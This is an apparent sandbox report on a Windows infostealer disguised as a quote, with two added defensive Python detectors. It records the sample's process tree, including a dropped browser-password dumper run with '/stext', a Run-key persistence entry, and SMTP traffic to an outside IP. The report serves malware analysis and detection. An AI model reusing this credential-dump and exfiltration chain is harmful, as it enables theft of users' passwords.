
Windows Analysis Report
Quote for new order 2025.exe

Overview

General Information

Sample name:Quote for new order 2025.exe
Analysis ID:1586086
MD5:11de9d1bb135adb354e26bdad47037c9
SHA1:5fbeaf0df88266d5562da5c5f28ccd80e08f349b
SHA256:9285b4abeb09d675bc06b47444261c1f0034613d08b44b69c99c8ef63b1cfa72

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected WebBrowserPassView password recovery tool
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Quote for new order 2025.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\Quote for new order 2025.exe" MD5: 11DE9D1BB135ADB354E26BDAD47037C9)
    • cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Chrom.exe (PID: 7612 cmdline: .\Chrom.exe /stext .\output.txt MD5: 2024EA60DA870A221DB260482117258B)
  • Quote for new order 2025.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\Quote for new order 2025.exe" MD5: 11DE9D1BB135ADB354E26BDAD47037C9)
    • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Chrom.exe (PID: 7948 cmdline: .\Chrom.exe /stext .\output.txt MD5: 2024EA60DA870A221DB260482117258B)
  • Quote for new order 2025.exe (PID: 8168 cmdline: "C:\Users\user\Desktop\Quote for new order 2025.exe" MD5: 11DE9D1BB135ADB354E26BDAD47037C9)
    • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Chrom.exe (PID: 1816 cmdline: .\Chrom.exe /stext .\output.txt MD5: 2024EA60DA870A221DB260482117258B)
  • cleanup
No configs have been found
Yara matches (rule: JoeSecurity_WebBrowserPassView, description: Yara detected WebBrowserPassView password recovery tool, author: Joe Security, no matched strings listed):

Files:
  Quote for new order 2025.exe
  C:\Users\user\Desktop\Chrom.exe

Memory dumps:
  00000004.00000000.1676249370.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
  00000008.00000002.1819130753.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
  00000008.00000000.1800979457.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
  0000000E.00000000.1883289782.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
  00000000.00000000.1658990510.0000000000E92000.00000002.00000001.01000000.00000003.sdmp
  (6 further entries collapsed in the original report)

Unpacked PE images:
  0.0.Quote for new order 2025.exe.eaa5ec.1.unpack
  14.2.Chrom.exe.400000.0.unpack
  4.0.Chrom.exe.400000.0.unpack
  0.0.Quote for new order 2025.exe.eaa5ec.1.raw.unpack
  8.0.Chrom.exe.400000.0.unpack
  (4 further entries collapsed in the original report)

                          System Summary

Sigma: CurrentVersion Autorun Keys Modification (authors: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split))
  Source: Registry Key set
  EventID: 13, EventType: SetValue
  Image: C:\Users\user\Desktop\Quote for new order 2025.exe, ProcessId: 7396
  TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Application
  Details: C:\Users\user\Desktop\Quote for new order 2025.exe
Sigma: Suspicious Outbound SMTP Connections (author: frack113)
  Source: Network Connection
  EventID: 3, Protocol: tcp, Initiated: true
  Image: C:\Users\user\Desktop\Quote for new order 2025.exe, ProcessId: 7396
  SourceIp: 192.168.2.4 (IPv6: false), SourcePort: 49733
  DestinationIp: 77.245.158.126 (IPv6: false), DestinationPort: 587
                          No Suricata rule has matched
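The two Sigma hits above and the process tree describe one chain driven by PID 7396: the sample writes an HKCU Run value, runs windown.bat through cmd.exe, which starts the dropped NirSoft tool Chrom.exe with the /stext switch (NirSoft's "save as text" option) to write recovered browser passwords to output.txt, and the sample itself then opens a TCP connection to port 587. Each Sigma rule fires on one of those events in isolation; the Python below is an added example, not code from the Joe Sandbox report or from any Sigma rule, that correlates all three over Sysmon-style event records and attributes the /stext child to its nearest non-shell ancestor so the dropper, not cmd.exe, is flagged. The event records are constructed from the values in this report plus one made-up benign Outlook connection (TEST-NET address); the allow-list of mail clients and the two-of-three threshold are assumptions.

```python
"""Correlate the three behaviours this report ties to PID 7396 (HKCU Run-key
write, NirSoft /stext credential dump in a child process, outbound SMTP)
over Sysmon-style event records. Added example; not Joe Sandbox or Sigma code."""
from collections import defaultdict

# Standard Sysmon event IDs: 1 = process create, 3 = network connection,
# 13 = registry value set.
RUN_KEY = "\\microsoft\\windows\\currentversion\\run\\"
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
SMTP_PORTS = {25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}          # assumed allow-list
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def image_name(path):
    """Last path component, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Return one alert per process showing at least two of the three behaviours.
    A /stext child is credited to the nearest ancestor that is not a shell."""
    procs = {}                                    # pid -> (ppid, image) from EID 1
    state = defaultdict(lambda: {"image": None, "run_key": None, "stext": None, "smtp": None})
    for ev in events:
        eid, pid = ev["EventID"], ev["ProcessId"]
        if eid == 1:
            procs[pid] = (ev.get("ParentProcessId"), ev.get("Image", ""))
            if "/stext" in ev.get("CommandLine", "").lower():
                anc = ev.get("ParentProcessId") or pid
                # walk up through cmd.exe / script hosts to the real launcher
                while anc in procs and image_name(procs[anc][1]) in SHELLS and procs[anc][0]:
                    anc = procs[anc][0]
                state[anc]["stext"] = ev["CommandLine"]
        elif eid == 13:
            target = ev.get("TargetObject", "").lower()
            image = ev.get("Image", "")
            # Run-key write by a binary living in a user-writable location
            if RUN_KEY in target and any(p in image.lower() for p in USER_WRITABLE):
                state[pid]["run_key"] = ev["TargetObject"]
                state[pid]["image"] = image
        elif eid == 3:
            image = ev.get("Image", "")
            # outbound SMTP from anything that is not a known mail client
            if (ev.get("Initiated") and ev.get("DestinationPort") in SMTP_PORTS
                    and image_name(image) not in MAIL_CLIENTS):
                state[pid]["smtp"] = "%s:%d" % (ev["DestinationIp"], ev["DestinationPort"])
                state[pid]["image"] = image
    alerts = []
    for pid, s in state.items():
        hits = [k for k in ("run_key", "stext", "smtp") if s[k]]
        if len(hits) >= 2:
            alerts.append({"pid": pid, "image": s["image"], "hits": hits,
                           **{k: s[k] for k in hits}})
    return alerts


def sample_events():
    """Constructed Sysmon-style records modelled on this report's process tree
    and Sigma matches, plus one benign mail-client connection (not a real log)."""
    dropper = "C:\\Users\\user\\Desktop\\Quote for new order 2025.exe"
    return [
        {"EventID": 13, "ProcessId": 7396, "Image": dropper, "EventType": "SetValue",
         "TargetObject": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Application"},
        {"EventID": 1, "ProcessId": 7552, "ParentProcessId": 7396,
         "Image": "C:\\Windows\\system32\\cmd.exe",
         "CommandLine": 'C:\\Windows\\system32\\cmd.exe /c ""C:\\Users\\user\\Desktop\\windown.bat" "'},
        {"EventID": 1, "ProcessId": 7612, "ParentProcessId": 7552,
         "Image": "C:\\Users\\user\\Desktop\\Chrom.exe",
         "CommandLine": ".\\Chrom.exe /stext .\\output.txt"},
        {"EventID": 3, "ProcessId": 7396, "Image": dropper, "Initiated": True,
         "Protocol": "tcp", "DestinationIp": "77.245.158.126", "DestinationPort": 587},
        # constructed benign noise: a real mail client using the submission port
        {"EventID": 3, "ProcessId": 4100, "Initiated": True, "Protocol": "tcp",
         "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
         "DestinationIp": "203.0.113.10", "DestinationPort": 587},
    ]


if __name__ == "__main__":
    for alert in correlate(sample_events()):
        print(alert)
```

The two-of-three threshold keeps the rule from firing on a lone Run-key write by an installer or a lone port-587 connection by an unlisted mail client; on a real host the records would come from Sysmon event forwarding with the same field names.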


                          AV Detection

Source: Quote for new order 2025.exe | Avira: detected
Source: C:\Users\user\Desktop\Chrom.exe | ReversingLabs: Detection: 80%
Source: Quote for new order 2025.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.4% probability
Source: Quote for new order 2025.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Chrom.exe | Code function 4_2_00407687: GetProcAddress, FreeLibrary, CryptUnprotectData, CryptUnprotectData
Source: Quote for new order 2025.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Quote for new order 2025.exe | Binary string: \obj\Debug\FoxmaiI.pdb
Source: Quote for new order 2025.exe, Chrom.exe.0.dr | Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb
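Both PDB paths are present in the main sample: its own (\obj\Debug\FoxmaiI.pdb, spelled with a capital I where "Foxmail" has an l) and the NirSoft WebBrowserPassView one, because Chrom.exe is carried inside the sample and dropped by it (Chrom.exe.0.dr). Walking the outer PE's debug directory would only return the first; scanning the raw bytes for CodeView RSDS records returns both. The Python below is an added example, not code from the report, that does that scan; the byte blob it runs on is constructed here with made-up GUIDs and ages and contains only the two path strings the report lists, plus a chance "RSDS" byte sequence to show the false-positive check.

```python
"""Find PDB paths in a PE (or anything embedding one) by scanning for CodeView
RSDS records. Added example; not part of the Joe Sandbox report."""
import struct
import uuid

RSDS_HDR = 4 + 16 + 4   # "RSDS" signature, 16-byte GUID, uint32 age


def find_pdb_paths(data):
    """Return [(guid, age, path)] for every plausible RSDS record in `data`.
    Scanning the whole buffer, rather than walking IMAGE_DEBUG_DIRECTORY,
    also surfaces records belonging to PE files embedded in the sample."""
    found = []
    pos = data.find(b"RSDS")
    while pos != -1:
        start = pos + RSDS_HDR
        if start < len(data):
            guid = uuid.UUID(bytes_le=data[pos + 4:pos + 20])
            (age,) = struct.unpack_from("<I", data, pos + 20)
            end = data.find(b"\x00", start)
            raw = data[start:end if end != -1 else len(data)]
            try:
                path = raw.decode("ascii")
            except UnicodeDecodeError:
                path = ""
            # a real record's path ends in .pdb; anything else is a chance hit
            if path.lower().endswith(".pdb"):
                found.append((str(guid), age, path))
        pos = data.find(b"RSDS", pos + 4)
    return found


def rsds_record(guid, age, path):
    """Build one RSDS record (used only to construct the test image)."""
    return (b"RSDS" + uuid.UUID(guid).bytes_le + struct.pack("<I", age)
            + path.encode("ascii") + b"\x00")


def sample_image():
    """Constructed stand-in for the sample: filler, the dropper's own record,
    a chance 'RSDS' byte sequence, then the embedded NirSoft tool's record.
    GUIDs and ages are made up; the paths are the two the report lists."""
    return (b"MZ" + b"\x90" * 40
            + rsds_record("0f1e2d3c-4b5a-6978-8796-a5b4c3d2e1f0", 1,
                          "\\obj\\Debug\\FoxmaiI.pdb")
            + b"\x00" * 16 + b"RSDS" + b"A" * 40          # not a record
            + rsds_record("11223344-5566-7788-99aa-bbccddeeff00", 7,
                          "c:\\Projects\\VS2005\\WebBrowserPassView\\Command-Line\\WebBrowserPassView.pdb")
            + b"\x00" * 8)


if __name__ == "__main__":
    for guid, age, path in find_pdb_paths(sample_image()):
        print(guid, age, path)
```

Run against a real file with `find_pdb_paths(open(path, "rb").read())`; a PE that yields a NirSoft project path alongside its own is the static counterpart of the Yara hit on both the sample and its dropped file.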
Source: C:\Users\user\Desktop\Chrom.exe | Code function 4_2_0040B477: FindFirstFileW, FindNextFileW
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function 0_2_09E064E8: 4x nop then mov ecx, 70BB479Ch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function 0_2_09E017D0: 4x nop then mov ecx, dword ptr [ebp-000007E4h] (reported 3 times)
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function 5_2_06F863B0: 4x nop then mov ecx, 70BB479Ch
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function 5_2_06F81710: 4x nop then mov ecx, dword ptr [ebp-000007E4h] (reported 3 times)
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function 11_2_075C0FD8: 4x nop then mov ecx, dword ptr [ebp-000007E4h] (reported 3 times)
Source: C:\Users\user\Desktop\Quote for new order 2025.exe | Code function 11_2_075C5E58: 4x nop then mov ecx, 70BB479Ch
Source: global traffic | TCP traffic: 192.168.2.4:49733 -> 77.245.158.126:587
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: Quote for new order 2025.exe, Chrom.exe.0.dr | String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login | equals www.facebook.com (Facebook) and www.yahoo.com (Yahoo)
Source: Chrom.exe | String found in binary or memory: http://www.facebook.com/ | equals www.facebook.com (Facebook)
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: pop-lva1.www.linkedin.com | equals www.linkedin.com (Linkedin)
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: pop-lva1.www.linkedin.com0 | equals www.linkedin.com (Linkedin)
Source: Chrom.exe, 00000004.00000003.1693528910.000000000098D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1819462816.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Chrom.exe, 00000008.00000003.1818673130.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login | equals www.facebook.com (Facebook) and www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: mail.lmd.com.tr
(The bhv*.tmp.N.dr files below are written by the Chrom.exe processes 4, 8 and 14, and the URLs found in them look like cached browser and certificate data of the analysis VM read back by the password-recovery tool, not attacker infrastructure; the only network indicators the sample itself produced are mail.lmd.com.tr and 77.245.158.126:587 above. The font-vendor URLs from the sample's own memory dump look like embedded font resources.)
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv428D.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv428D.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv428D.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: bhvF18F.tmp.4.dr, bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://ocspx.digicert.com0E
Source: Quote for new order 2025.exe, 00000000.00000002.3530691403.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Quote for new order 2025.exe, 00000005.00000002.3530288167.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Quote for new order 2025.exe, 0000000B.00000002.3529863966.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: bhv428D.tmp.14.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://www.digicert.com/CPS0~
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: Chrom.exe, 00000004.00000002.1693705327.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Chrom.exe, 00000008.00000002.1818996004.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Chrom.exe, 0000000E.00000002.1901410541.0000000000193000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: Quote for new order 2025.exe, Chrom.exe.0.dr | String found in binary or memory: http://www.nirsoft.net/
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Quote for new order 2025.exe, 00000000.00000002.3539348359.0000000005D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.comH4
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: Quote for new order 2025.exe, 00000000.00000002.3539959930.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.dr | String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhv428D.tmp.14.dr | String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
